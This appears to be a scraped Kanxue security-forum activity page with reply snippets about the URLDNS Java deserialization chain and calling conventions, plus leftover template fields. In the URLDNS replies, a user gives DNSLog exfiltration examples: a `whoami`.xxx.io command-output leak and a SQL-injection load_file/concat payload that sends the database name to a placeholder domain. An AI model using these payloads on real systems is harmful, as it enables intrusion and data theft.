|
[原创]URLDNS反序列化利用链
Met三二 探测反序列用的,而且urldns也和执行命令没有关系吧。`whoami`.xxx.io这和urldns链没关系啊。看来你应该是刚学java吧。。我也没说`whoami`.xxx.io是urldns链呀,我只说这是dnslog的一种利用方式,dnslog又不是只能用来探测反序列化漏洞 |
|
[原创]URLDNS反序列化利用链
单说这个利用链,纯粹就是为了验证目标是否存在反序列化漏洞。DNSLog还有其它作用,比如我说的sql注入,或者ping `whoami`.xxx.io可以得到系统用户名。 |
|
|
|
|
|
[原创]URLDNS反序列化利用链
guduzhe 除了触发dns的查询请求,有其他什么危害么dnslog的作用是可以在域名前添加自定义前缀,这个前缀可以是命令执行结果,比如`whoami`.xxx.io,也可用于sql注入,比如select load_file(concat('\\\\',database(),'.xxx.io\\aax')) |
|
|
|
[原创]函数调用约定
plusv >后续的x64架构新增了R8~R15共8个寄存器我倒是 好奇,若 传入 20-30 个 参数 是 ...没试过这么多参数,你可以上机调试一下看看 |
|
[原创]函数调用约定
lovepd 很好的文章,对汇编初学者很有帮助! __cdecl 这是C标准调用约定,de即default的缩写(纠正一下,这里的cdecl是指C declaration) The cdecl (whic ...感谢指正 |
|
[公告] 看雪社区会员成长体系:能力值、活跃值和雪币!(2024/4/2更新)
发帖都是待验证状态是为什么? |
操作理由
RANk
{{ user_info.golds == '' ? 0 : user_info.golds }}
雪币
{{ experience }}
课程经验
{{ score }}
学习收益
{{study_duration_fmt}}
学习时长
基本信息
荣誉称号:
{{ honorary_title }}
能力排名:
No.{{ rank_num }}
等 级:
LV{{ rank_lv-100 }}
活跃值:
在线值:
浏览人数:{{ visits }}
最近活跃:{{ last_active_time }}
注册时间:{{ user_info.create_date_jsonfmt }}
勋章
兑换勋章
证书
证书查询 >
能力值